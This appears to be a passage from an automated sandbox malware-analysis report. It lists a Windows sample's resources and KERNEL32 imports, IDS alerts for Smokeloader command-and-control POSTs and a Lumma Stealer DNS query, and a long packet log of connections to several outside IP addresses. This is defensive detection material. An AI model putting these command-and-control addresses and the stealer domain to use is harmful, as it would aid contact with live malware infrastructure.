RT_GROUP_ICON | 0x1b850e8 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x1b72958 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x1b86188 | 0x1e4 | data | | | 0.5785123966942148
DLL | Import
KERNEL32.dll | SetDefaultCommConfigA, SleepEx, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesA, GetConsoleAliasesLengthA, EnumTimeFormatsW, ActivateActCtx, ReadFileScatter, WriteConsoleOutputA, InitAtomTable, InterlockedPopEntrySList, SetConsoleMode, GetFileAttributesW, LocalReAlloc, FileTimeToSystemTime, GetModuleFileNameW, CompareStringW, RaiseException, InterlockedExchange, SetLastError, GetProcAddress, GetProcessHeaps, BuildCommDCBW, LoadLibraryA, UnhandledExceptionFilter, SetConsoleTitleW, DeleteCriticalSection, GetShortPathNameW, SetCalendarInfoA, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/27/24-15:24:02.901341 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53079 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:26:24.246699 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53126 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:27:00.582448 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53132 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:25:27.096781 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53116 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:38.823921 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53070 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:31.525949 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49712 | 80 | 192.168.2.8 | 190.13.174.94
05/27/24-15:25:44.351947 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53119 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:40.496460 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53073 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:26:42.784525 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53129 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:24:08.932496 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53084 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:30.215169 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49711 | 80 | 192.168.2.8 | 190.13.174.94
05/27/24-15:26:13.597836 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53124 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:25:56.339916 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53121 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:26.259477 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49708 | 80 | 192.168.2.8 | 190.13.174.94
05/27/24-15:25:32.321607 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53117 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:36.361209 | UDP | 2052787 | ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) | 51397 | 53 | 192.168.2.8 | 1.1.1.1
05/27/24-15:23:37.979178 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53069 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:26:32.065397 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53127 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:26:05.875359 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53123 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:25:49.165527 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53120 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:28.922755 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49710 | 80 | 192.168.2.8 | 190.13.174.94
05/27/24-15:24:07.131322 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53083 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:39.639948 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53072 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:26:50.105825 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53130 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:26:19.087513 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53125 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:26:55.402930 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53131 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:25:21.588725 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53115 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:33.065019 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53061 | 80 | 192.168.2.8 | 190.13.174.94
05/27/24-15:25:39.368553 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53118 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:26:00.859899 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53122 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:26:37.380508 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53128 | 80 | 192.168.2.8 | 190.147.128.172
05/27/24-15:24:03.722157 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 53080 | 80 | 192.168.2.8 | 109.175.29.39
05/27/24-15:23:27.616899 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49709 | 80 | 192.168.2.8 | 190.13.174.94
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            May 27, 2024 15:23:35.100377083 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.162657976 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.162703037 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.162760019 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.162795067 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.162842989 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.162842989 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.162853956 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.162909985 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.162962914 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.162969112 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.162997007 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.163033009 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.163064003 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.163904905 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.163938999 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.163973093 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164005995 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164020061 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.164021015 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.164040089 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164144993 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.164741039 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164773941 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164810896 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164843082 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164877892 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.164887905 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.164887905 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.165663958 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.165695906 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.165712118 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.165730953 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.165765047 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.165837049 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.168056965 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.168091059 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.168108940 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.209536076 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.276756048 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.276849985 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.276902914 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.276906967 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.276937962 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.276973963 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277007103 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277009964 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277043104 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277076006 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277110100 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277118921 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277118921 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277143002 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277177095 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277209997 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277245045 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277251005 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277251005 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277277946 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277313948 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277405977 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277419090 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277462006 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277503014 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277546883 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277548075 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277590990 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277623892 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277657032 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277689934 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277714968 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277724028 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277756929 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277759075 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277791977 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277827978 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.277873993 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.277873993 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.278359890 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278414011 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278464079 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278490067 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.278544903 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278578997 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278613091 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278645039 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278659105 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.278659105 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.278677940 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278709888 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278743982 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278778076 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.278789997 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.278789997 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.279356956 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279506922 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279541016 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279573917 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279587030 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.279587030 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.279606104 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279639959 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279671907 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279706001 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279716015 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.279716015 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.279737949 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279771090 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279784918 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.279805899 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.279875994 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.363481045 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.390738010 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.390811920 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.390845060 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.390877962 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.390897989 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.390908003 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.390933990 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.390969038 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.390991926 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391001940 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391035080 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391068935 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391102076 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391110897 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391110897 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391136885 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391169071 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391195059 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391202927 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391237020 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391269922 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391303062 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391303062 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391329050 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391340017 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391370058 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391432047 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391746044 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.391830921 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.391982079 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392036915 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392169952 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392231941 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392265081 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392298937 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392354965 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392355919 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392407894 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392441034 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392473936 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392484903 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392484903 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392508030 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392540932 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392573118 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392606974 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392611027 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392611027 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392638922 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392673969 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392705917 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392740011 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392749071 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392749071 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392774105 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392807961 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392839909 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392878056 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392878056 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.392904043 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392954111 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.392987013 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393018961 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393052101 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393059969 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.393059969 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.393084049 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393116951 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393172979 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393205881 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393212080 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.393212080 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.393239975 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393274069 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393306017 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393322945 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.393338919 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393357992 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.393376112 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393409014 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393444061 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.393466949 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.393496037 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.396733046 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396744013 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396754980 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396815062 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396826982 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396836996 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396859884 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.396859884 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.396889925 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.396960974 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396972895 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396982908 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.396994114 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.397006989 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.397017956 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.397031069 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.397039890 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.397039890 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.397042990 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.397063017 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.397072077 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:35.397083998 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.397083998 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.397149086 CEST5306480192.168.2.845.129.96.86
                                                            May 27, 2024 15:23:35.397650003 CEST805306445.129.96.86192.168.2.8
                                                            May 27, 2024 15:23:40.475568056 CEST8053072109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:40.476231098 CEST8053072109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:40.476867914 CEST5307280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:40.476867914 CEST5307280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:40.481828928 CEST8053072109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:40.490291119 CEST5307380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:40.496228933 CEST8053073109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:40.496361971 CEST5307380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:40.496459961 CEST5307380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:40.496459961 CEST5307380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:40.502451897 CEST8053073109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:40.502893925 CEST8053073109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:40.545026064 CEST44353071188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:40.545137882 CEST44353071188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:40.545207977 CEST53071443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:40.545294046 CEST53071443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:40.545331955 CEST44353071188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:40.770468950 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:40.770562887 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:40.770669937 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:40.770988941 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:40.771028996 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.263323069 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.263500929 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:41.264842033 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:41.264872074 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.265173912 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.266453028 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:41.266614914 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:41.266661882 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.266727924 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:41.266741991 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.478162050 CEST8053073109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:41.478981972 CEST8053073109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:41.479098082 CEST5307380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:41.479223967 CEST5307380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:23:41.485064983 CEST8053073109.175.29.39192.168.2.8
                                                            May 27, 2024 15:23:41.491461039 CEST5307580192.168.2.823.145.40.124
                                                            May 27, 2024 15:23:41.498495102 CEST805307523.145.40.124192.168.2.8
                                                            May 27, 2024 15:23:41.498573065 CEST5307580192.168.2.823.145.40.124
                                                            May 27, 2024 15:23:41.498828888 CEST5307580192.168.2.823.145.40.124
                                                            May 27, 2024 15:23:41.505170107 CEST805307523.145.40.124192.168.2.8
                                                            May 27, 2024 15:23:41.773598909 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.773777962 CEST44353074188.114.96.3192.168.2.8
                                                            May 27, 2024 15:23:41.773808002 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:41.773828030 CEST53074443192.168.2.8188.114.96.3
                                                            May 27, 2024 15:23:42.027724981 CEST53076443192.168.2.8188.114.96.3
